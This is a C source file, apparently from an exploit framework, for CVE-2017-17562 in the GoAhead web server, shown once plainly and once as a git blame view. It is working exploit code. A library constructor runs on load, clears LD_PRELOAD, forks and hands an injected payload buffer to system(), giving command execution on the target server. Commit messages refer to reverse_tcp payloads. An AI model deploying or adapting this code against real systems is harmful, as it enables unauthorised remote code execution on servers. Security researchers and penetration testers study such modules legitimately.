data/exploits/CVE-2017-17562/goahead-cgi-system.c

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif

#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif

#define PAYLOAD_SIZE 5000
unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};

static void _run_payload_(void) __attribute__((constructor));

static void _run_payload_(void)
{
    int dummy = 0;
    unsetenv("LD_PRELOAD");
    if (! fork())
      dummy = system((const char*)payload);

    exit(dummy);
}
WIP for GoAhead LD_PRELOAD 2017-12-18 10:51:47 -06:00			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <stdbool.h>`
			`#include <unistd.h>`
			`#include <sys/mman.h>`
			`#include <string.h>`
			`#include <stdlib.h>`

			`#ifdef OLD_LIB_SET_1`
			`__asm__(".symver system,system@GLIBC_2.0");`
			`__asm__(".symver fork,fork@GLIBC_2.0");`
			`#endif`

			`#ifdef OLD_LIB_SET_2`
			`__asm__(".symver system,system@GLIBC_2.2.5");`
			`__asm__(".symver fork,fork@GLIBC_2.2.5");`
			`#endif`

Remove the useless findsock wrapper 2017-12-18 22:09:35 -06:00			`#define PAYLOAD_SIZE 5000`
WIP for GoAhead LD_PRELOAD 2017-12-18 10:51:47 -06:00			`unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};`

			`static void _run_payload_(void) __attribute__((constructor));`

			`static void _run_payload_(void)`
			`{`
Resolve a bug in reverse_tcp and segfaults across payloads 2017-12-29 14:18:55 -06:00			`int dummy = 0;`
WIP for GoAhead LD_PRELOAD 2017-12-18 10:51:47 -06:00			`unsetenv("LD_PRELOAD");`
			`if (! fork())`
Resolve a bug in reverse_tcp and segfaults across payloads 2017-12-29 14:18:55 -06:00			`dummy = system((const char*)payload);`

			`exit(dummy);`
WIP for GoAhead LD_PRELOAD 2017-12-18 10:51:47 -06:00			`}`